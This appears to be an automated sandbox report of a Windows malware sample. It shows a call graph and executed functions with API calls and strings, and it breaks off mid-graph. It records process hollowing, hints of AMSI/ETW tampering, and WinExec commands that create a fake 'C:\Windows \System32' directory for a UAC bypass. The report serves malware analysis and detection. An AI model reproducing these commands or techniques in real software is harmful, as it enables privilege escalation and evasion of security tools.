36300 40b7fcc 36299->36300 36301 40b994b 36300->36301 36302 40a47d0 11 API calls 36300->36302 36303 40a4494 11 API calls 36301->36303 36306 40b7ffd 36302->36306 36304 40b9968 36303->36304 36305 40a4494 11 API calls 36304->36305 36307 40b9978 36305->36307 36309 40a475c 11 API calls 36306->36309 36308 40a4bd0 SysFreeString 36307->36308 36310 40b9983 36308->36310 36314 40b8022 36309->36314 36311 40a4494 11 API calls 36310->36311 36312 40b9993 36311->36312 36313 40a4470 11 API calls 36312->36313 36315 40b999b 36313->36315 36317 40b7b88 17 API calls 36314->36317 36316 40a4494 11 API calls 36315->36316 36318 40b99a8 36316->36318 36319 40b803d 36317->36319 36320 40a4494 11 API calls 36318->36320 36321 40a47d0 11 API calls 36319->36321 36322 40b99b5 36320->36322 36323 40b8056 36321->36323 36322->35644 36324 40a475c 11 API calls 36323->36324 36325 40b807b 36324->36325 36326 40b7b88 17 API calls 36325->36326 36327 40b8096 36326->36327 36327->36301 36328 40a47d0 11 API calls 36327->36328 36329 40b80de 36328->36329 36330 40a475c 11 API calls 36329->36330 36331 40b8103 36330->36331 36332 40b7b88 17 API calls 36331->36332 36333 40b811e 36332->36333 36334 40a47d0 11 API calls 36333->36334 36335 40b8137 36334->36335 36336 40a475c 11 API calls 36335->36336 36337 40b815c 36336->36337 36338 40b7b88 17 API calls 36337->36338 36339 40b8177 36338->36339 36340 40a47d0 11 API calls 36339->36340 36341 40b81bc 36340->36341 36342 40a475c 11 API calls 36341->36342 36343 40b81e1 36342->36343 36344 40b7b88 17 API calls 36343->36344 36345 40b81fc 36344->36345 36346 40a47d0 11 API calls 36345->36346 36347 40b8215 36346->36347 36348 40a475c 11 API calls 36347->36348 36349 40b823d 36348->36349 36350 40b7b88 17 API calls 36349->36350 36351 40b825b 36350->36351 36352 40a47d0 11 API calls 36351->36352 36353 40b8277 36352->36353 36354 40a475c 11 API calls 36353->36354 36355 40b82a8 36354->36355 36356 40b7b88 17 API calls 36355->36356 36357 40b82cc 36356->36357 36358 40a47d0 11 API calls 36357->36358 36359 40b82e8 36358->36359 36360 40a475c 11 API calls 36359->36360 36361 40b8319 36360->36361 36362 40b7b88 17 API calls 36361->36362 36363 40b833d 36362->36363 36364 40a47d0 11 API calls 36363->36364 36365 40b8359 36364->36365 36366 40a475c 11 API calls 36365->36366 36367 40b838a 36366->36367 36368 40b7b88 17 API calls 36367->36368 36369 40b83ae 36368->36369 36370 40b83dd CreateProcessAsUserW 36369->36370 36371 40b83ef 36370->36371 36372 40b8460 36370->36372 36374 40a47d0 11 API calls 36371->36374 36373 40a47d0 11 API calls 36372->36373 36375 40b847c 36373->36375 36376 40b840b 36374->36376 36377 40a475c 11 API calls 36375->36377 36378 40a475c 11 API calls 36376->36378 36380 40b84ad 36377->36380 36379 40b843c 36378->36379 36382 40b7b88 17 API calls 36379->36382 36381 40b7b88 17 API calls 36380->36381 36383 40b84d1 36381->36383 36382->36372 36384 40b7b88 17 API calls 36383->36384 36385 40b8504 36384->36385 36386 40a47d0 11 API calls 36385->36386 36387 40b8520 36386->36387 36388 40a475c 11 API calls 36387->36388 36389 40b8551 36388->36389 36390 40b7b88 17 API calls 36389->36390 36391 40b8575 36390->36391 36392 40a47d0 11 API calls 36391->36392 36393 40b8591 36392->36393 36394 40a475c 11 API calls 36393->36394 36395 40b85c2 36394->36395 36396 40b7b88 17 API calls 36395->36396 36397 40b85e6 36396->36397 36398 40a2ee0 2 API calls 36397->36398 36399 40b85eb 36398->36399 36400 40a47d0 11 API calls 36399->36400 36401 40b8633 36400->36401 36402 40a475c 11 API calls 36401->36402 36403 40b8664 36402->36403 36404 40b7b88 17 API calls 36403->36404 36405 40b8688 36404->36405 36406 40a47d0 11 API calls 36405->36406 36407 40b86a4 36406->36407 36408 40a475c 11 API calls 36407->36408 36409 40b86d5 36408->36409 36410 40b7b88 17 API calls 36409->36410 36411 40b86f9 36410->36411 36412 40a47d0 11 API calls 36411->36412 36413 40b8715 36412->36413 36414 40a475c 11 API calls 36413->36414 36415 40b8746 36414->36415 36416 40b7b88 17 API calls 36415->36416 36417 40b876a GetThreadContext 36416->36417 36417->36301 36418 40b878c 36417->36418 36419 40a47d0 11 API calls 36418->36419 36420 40b87a8 36419->36420 36421 40a475c 11 API calls 36420->36421 36422 40b87d9 36421->36422 36423 40b7b88 17 API calls 36422->36423 36424 40b87fd 36423->36424 36425 40a47d0 11 API calls 36424->36425 36426 40b8819 36425->36426 36427 40a475c 11 API calls 36426->36427 36428 40b884a 36427->36428 36429 40b7b88 17 API calls 36428->36429 36430 40b886e 36429->36430 36431 40a47d0 11 API calls 36430->36431 36432 40b888a 36431->36432 36433 40a475c 11 API calls 36432->36433 36434 40b88bb 36433->36434 36435 40b7b88 17 API calls 36434->36435 36436 40b88df 36435->36436 36437 40a47d0 11 API calls 36436->36437 36438 40b88fb 36437->36438 36439 40a475c 11 API calls 36438->36439 36440 40b892c 36439->36440 36441 40b7b88 17 API calls 36440->36441 36442 40b8950 36441->36442 36443 40a47d0 11 API calls 36442->36443 36444 40b896c 36443->36444 36445 40a475c 11 API calls 36444->36445 36446 40b899d 36445->36446 36447 40b7b88 17 API calls 36446->36447 36448 40b89c1 NtReadVirtualMemory 36447->36448 36449 40b8cfc 36448->36449 36450 40b89f5 36448->36450 36451 40a47d0 11 API calls 36449->36451 36452 40a47d0 11 API calls 36450->36452 36453 40b8d18 36451->36453 36454 40b8a11 36452->36454 36456 40a475c 11 API calls 36453->36456 36455 40a475c 11 API calls 36454->36455 36457 40b8a42 36455->36457 36458 40b8d49 36456->36458 36460 40b7b88 17 API calls 36457->36460 36459 40b7b88 17 API calls 36458->36459 36461 40b8d6d 36459->36461 36462 40b8a66 36460->36462 36463 40a47d0 11 API calls 36461->36463 36464 40a47d0 11 API calls 36462->36464 36465 40b8d89 36463->36465 36466 40b8a82 36464->36466 36467 40a475c 11 API calls 36465->36467 36468 40a475c 11 API calls 36466->36468 36470 40b8dba 36467->36470 36469 40b8ab3 36468->36469 36471 40b7b88 17 API calls 36469->36471 36472 40b7b88 17 API calls 36470->36472 36474 40b8ad7 36471->36474 36473 40b8dde 36472->36473 36475 40a47d0 11 API calls 36473->36475 36476 40a47d0 11 API calls 36474->36476 36477 40b8dfa 36475->36477 36478 40b8af3 36476->36478 36479 40a475c 11 API calls 36477->36479 36480 40a475c 11 API calls 36478->36480 36482 40b8e2b 36479->36482 36481 40b8b24 36480->36481 36483 40b7b88 17 API calls 36481->36483 36484 40b7b88 17 API calls 36482->36484 36485 40b8b48 NtUnmapViewOfSection 36483->36485 36486 40b8e4f 36484->36486 36487 40b8b88 36485->36487 36488 40b8b60 36485->36488 36489 40a47d0 11 API calls 36486->36489 36491 40a47d0 11 API calls 36487->36491 36703 40b78f8 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 36488->36703 36493 40b8e6b 36489->36493 36495 40b8ba4 36491->36495 36492 40b8b81 36494 40a47d0 11 API calls 36492->36494 36496 40a475c 11 API calls 36493->36496 36498 40b8c15 36494->36498 36497 40a475c 11 API calls 36495->36497 36499 40b8e9c 36496->36499 36501 40b8bd5 36497->36501 36500 40a475c 11 API calls 36498->36500 36502 40b7b88 17 API calls 36499->36502 36505 40b8c46 36500->36505 36503 40b7b88 17 API calls 36501->36503 36504 40b8ec0 36502->36504 36503->36492 36693 40b78f8 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 36504->36693 36508 40b7b88 17 API calls 36505->36508 36507 40b8ee1 36507->36301 36509 40a47d0 11 API calls 36507->36509 36510 40b8c6a 36508->36510 36512 40b8f0f 36509->36512 36511 40a47d0 11 API calls 36510->36511 36513 40b8c86 36511->36513 36514 40a475c 11 API calls 36512->36514 36515 40a475c 11 API calls 36513->36515 36516 40b8f40 36514->36516 36517 40b8cb7 36515->36517 36518 40b7b88 17 API calls 36516->36518 36519 40b7b88 17 API calls 36517->36519 36520 40b8f64 36518->36520 36521 40b8cdb 36519->36521 36522 40a47d0 11 API calls 36520->36522 36704 40b78f8 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 36521->36704 36525 40b8f80 36522->36525 36524 40b8cf5 36524->36461 36526 40a475c 11 API calls 36525->36526 36527 40b8fb1 36526->36527 36528 40b7b88 17 API calls 36527->36528 36529 40b8fd5 36528->36529 36694 40b7df8 36529->36694 36531 40a47d0 11 API calls 36533 40b905c 36531->36533 36532 40b8fdc 36532->36531 36534 40a475c 11 API calls 36533->36534 36535 40b908d 36534->36535 36536 40b7b88 17 API calls 36535->36536 36537 40b90b1 36536->36537 36538 40a47d0 11 API calls 36537->36538 36539 40b90cd 36538->36539 36540 40a475c 11 API calls 36539->36540 36541 40b90fe 36540->36541 36542 40b7b88 17 API calls 36541->36542 36543 40b9122 36542->36543 36544 40a47d0 11 API calls 36543->36544 36545 40b913e 36544->36545 36546 40a475c 11 API calls 36545->36546 36547 40b916f 36546->36547 36548 40b7b88 17 API calls 36547->36548 36549 40b9193 NtWriteVirtualMemory 36548->36549 36550 40a47d0 11 API calls 36549->36550 36551 40b91cc 36550->36551 36552 40a475c 11 API calls 36551->36552 36553 40b91fd 36552->36553 36554 40b7b88 17 API calls 36553->36554 36555 40b9221 36554->36555 36556 40a47d0 11 API calls 36555->36556 36557 40b923d 36556->36557 36558 40a475c 11 API calls 36557->36558 36559 40b926e 36558->36559 36560 40b7b88 17 API calls 36559->36560 36561 40b9292 36560->36561 36562 40a47d0 11 API calls 36561->36562 36563 40b92ae 36562->36563 36564 40a475c 11 API calls 36563->36564 36565 40b92df 36564->36565 36566 40b7b88 17 API calls 36565->36566 36567 40b9303 NtWriteVirtualMemory 36566->36567 36568 40a47d0 11 API calls 36567->36568 36569 40b933f 36568->36569 36570 40a475c 11 API calls 36569->36570 36571 40b9370 36570->36571 36572 40b7b88 17 API calls 36571->36572 36573 40b9394 36572->36573 36574 40a47d0 11 API calls 36573->36574 36575 40b93b0 36574->36575 36576 40a475c 11 API calls 36575->36576 36577 40b93e1 36576->36577 36578 40b7b88 17 API calls 36577->36578 36579 40b9405 36578->36579 36580 40a47d0 11 API calls 36579->36580 36581 40b9421 36580->36581 36582 40a475c 11 API calls 36581->36582 36583 40b9452 36582->36583 36584 40b7b88 17 API calls 36583->36584 36585 40b9476 SetThreadContext NtResumeThread 36584->36585 36586 40a47d0 11 API calls 36585->36586 36587 40b94c2 36586->36587 36588 40a475c 11 API calls 36587->36588 36589 40b94f3 36588->36589 36590 40b7b88 17 API calls 36589->36590 36591 40b9517 36590->36591 36592 40a47d0 11 API calls 36591->36592 36593 40b9533 36592->36593 36594 40a475c 11 API calls 36593->36594 36595 40b9564 36594->36595 36596 40b7b88 17 API calls 36595->36596 36597 40b9588 36596->36597 36598 40a47d0 11 API calls 36597->36598 36599 40b95a4 36598->36599 36600 40a475c 11 API calls 36599->36600 36601 40b95d5 36600->36601 36602 40b7b88 17 API calls 36601->36602 36603 40b95f9 36602->36603 36604 40a47d0 11 API calls 36603->36604 36605 40b9615 36604->36605 36606 40a475c 11 API calls 36605->36606 36607 40b9646 36606->36607 36608 40b7b88 17 API calls 36607->36608 36609 40b966a 36608->36609 36610 40a2c2c 11 API calls 36609->36610 36611 40b9679 36610->36611 36612 40a47d0 11 API calls 36611->36612 36613 40b969b 36612->36613 36614 40a475c 11 API calls 36613->36614 36615 40b96cc 36614->36615 36616 40b7b88 17 API calls 36615->36616 36617 40b96f0 36616->36617 36697 40b7a50 LoadLibraryW 36617->36697 36620 40b7a50 4 API calls 36621 40b9718 36620->36621 36622 40b7a50 4 API calls 36621->36622 36623 40b972c 36622->36623 36624 40a47d0 11 API calls 36623->36624 36625 40b9748 36624->36625 36626 40a475c 11 API calls 36625->36626 36627 40b9779 36626->36627 36628 40b7b88 17 API calls 36627->36628 36629 40b979d 36628->36629 36630 40b7a50 4 API calls 36629->36630 36631 40b97b1 36630->36631 36632 40b7a50 4 API calls 36631->36632 36633 40b97c5 36632->36633 36634 40a47d0 11 API calls 36633->36634 36635 40b97e1 36634->36635 36636 40a475c 11 API calls 36635->36636 36637 40b97ff 36636->36637 36638 40b7a50 4 API calls 36637->36638 36639 40b9817 36638->36639 36640 40a47d0 11 API calls 36639->36640 36641 40b9833 36640->36641 36642 40a475c 11 API calls 36641->36642 36643 40b9851 36642->36643 36644 40b7a50 4 API calls 36643->36644 36645 40b9869 36644->36645 36646 40a47d0 11 API calls 36645->36646 36647 40b9885 36646->36647 36648 40a475c 11 API calls 36647->36648 36649 40b98b6 36648->36649 36650 40b7b88 17 API calls 36649->36650 36651 40b98da 36650->36651 36652 40a47d0 11 API calls 36651->36652 36653 40b98f6 36652->36653 36654 40a475c 11 API calls 36653->36654 36655 40b9927 36654->36655 36656 40b7b88 17 API calls 36655->36656 36656->36301 36657->35633 36658->35785 36659->35957 36660->35796 36674 40a4508 36661->36674 36664 40a475c 11 API calls 36665 40b7af3 36664->36665 36666 40b7afb GetModuleHandleA GetProcAddress VirtualProtect 36665->36666 36667 40b7b37 36666->36667 36668 40a4494 11 API calls 36667->36668 36669 40b7b44 36668->36669 36669->36235 36672 40a449a 36670->36672 36671 40a44c0 36671->35450 36672->36671 36673 40a2c2c 11 API calls 36672->36673 36673->36672 36676 40a450c 36674->36676 36675 40a4530 36675->36664 36676->36675 36677 40a2c2c 11 API calls 36676->36677 36677->36675 36678->36252 36679->36252 36681 40a4eac 36680->36681 36682 40a4e96 SysAllocStringLen 36680->36682 36681->36269 36682->36681 36683 40a4ba0 36682->36683 36684 40a4c33 36683->36684 36685 40a4bd0 36683->36685 36688 40a4c23 SysReAllocStringLen 36683->36688 36684->36269 36686 40a4bd6 SysFreeString 36685->36686 36687 40a4be4 36685->36687 36686->36687 36687->36269 36688->36683 36688->36684 36689->36272 36691 40a4bd6 SysFreeString 36690->36691 36692 40a4be4 36690->36692 36691->36692 36692->36279 36693->36507 36695 40a2c10 11 API calls 36694->36695 36696 40b7e2e 36695->36696 36696->36532 36698 40b7a9a 36697->36698 36699 40b7a6d GetProcAddress 36697->36699 36698->36620 36700 40b7a78 NtWriteVirtualMemory 36699->36700 36701 40b7a94 FreeLibrary 36699->36701 36700->36701 36702 40b7a92 36700->36702 36701->36698 36702->36701 36703->36492 36704->36524

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 040BD850 Relevance: 233.2, APIs: 14, Strings: 114, Instructions: 9202processsleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InetIsOffline.URL(00000000,00000000,040C9731,?,?,?,000002EC,00000000,00000000), ref: 040BD885
                                                                                                                                                                                            • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
                                                                                                                                                                                            • Part of subcall function 040A7DD4: GetFileAttributesA.KERNEL32(00000000,?,040BE36F,ScanString,04100344,040C9768,OpenSession,04100344,040C9768,ScanString,04100344,040C9768,UacScan,04100344,040C9768,UacInitialize), ref: 040A7DDF
                                                                                                                                                                                            • Part of subcall function 040AC2A8: GetModuleFileNameA.KERNEL32(00000000,?,00000105,041F4874,?,040BE690,ScanBuffer,04100344,040C9768,OpenSession,04100344,040C9768,ScanBuffer,04100344,040C9768,OpenSession), ref: 040AC2BF
                                                                                                                                                                                            • Part of subcall function 040BCE00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,040BCED0), ref: 040BCE3B
                                                                                                                                                                                            • Part of subcall function 040BCE00: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,040BCED0), ref: 040BCE6B
                                                                                                                                                                                            • Part of subcall function 040BCE00: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 040BCE80
                                                                                                                                                                                            • Part of subcall function 040BCE00: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 040BCEAC
                                                                                                                                                                                            • Part of subcall function 040BCE00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 040BCEB5
                                                                                                                                                                                            • Part of subcall function 040A7DF8: GetFileAttributesA.KERNEL32(00000000,?,040C13B4,ScanString,04100344,040C9768,OpenSession,04100344,040C9768,OpenSession,04100344,040C9768,ScanBuffer,04100344,040C9768,ScanString), ref: 040A7E03
                                                                                                                                                                                            • Part of subcall function 040A7F8C: CreateDirectoryA.KERNEL32(00000000,00000000,?,040C15A5,ScanBuffer,04100344,040C9768,OpenSession,04100344,040C9768,Initialize,04100344,040C9768,ScanString,04100344,040C9768), ref: 040A7F99
                                                                                                                                                                                          • WinExec.KERNEL32(cmd /c mkdir "\\?\C:\Windows ",00000000), ref: 040C1BD4
                                                                                                                                                                                          • WinExec.KERNEL32(cmd /c mkdir "\\?\C:\Windows \System32",00000000), ref: 040C1D54
                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8,ScanString,04100344,040C9768,cmd /c mkdir "\\?\C:\Windows \System32",00000000,ScanBuffer,04100344,040C9768,UacInitialize,04100344,040C9768,Initialize,04100344,040C9768,cmd /c mkdir "\\?\C:\Windows "), ref: 040C1DDA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesExecModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryReadSleep
                                                                                                                                                                                          • String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows \System32$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$cmd /c mkdir "\\?\C:\Windows "$cmd /c mkdir "\\?\C:\Windows \System32"$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                                                          • API String ID: 1211517183-1152008110
                                                                                                                                                                                          • Opcode ID: 2710da127c0b3e98bba154cd7beddb25790be6b4e2a361d828fe0410ac40a52f
                                                                                                                                                                                          • Instruction ID: 213aead65e13e92fdf7a95f22218548a0f2287178da34d518b3413bf257e789e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2710da127c0b3e98bba154cd7beddb25790be6b4e2a361d828fe0410ac40a52f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8914DB38A411598FEB10EBA4D980ECEB3B9EF8570CF5446E5A008BB614DB74BE95CF41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040C62C4 Relevance: 147.9, APIs: 5, Strings: 78, Instructions: 2689threadprocessnativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 4639 40c62c4-40c66b3 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a485c 4754 40c72bf-40c7442 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a485c 4639->4754 4755 40c66b9-40c688c call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a475c call 40a4910 call 40a4ce4 call 40a4d60 CreateProcessAsUserW 4639->4755 4845 40c7448-40c7457 call 40a485c 4754->4845 4846 40c7c13-40c9301 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 * 16 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 ExitProcess 4754->4846 4862 40c688e-40c6905 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 4755->4862 4863 40c690a-40c6a15 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 4755->4863 4845->4846 4853 40c745d-40c7730 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40bd418 call 40a47d0 call 40a4910 call 40a4668 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a7dd4 4845->4853 5111 40c7a0d-40c7c0e call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4968 call 40b7ee8 4853->5111 5112 40c7736-40c7a08 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 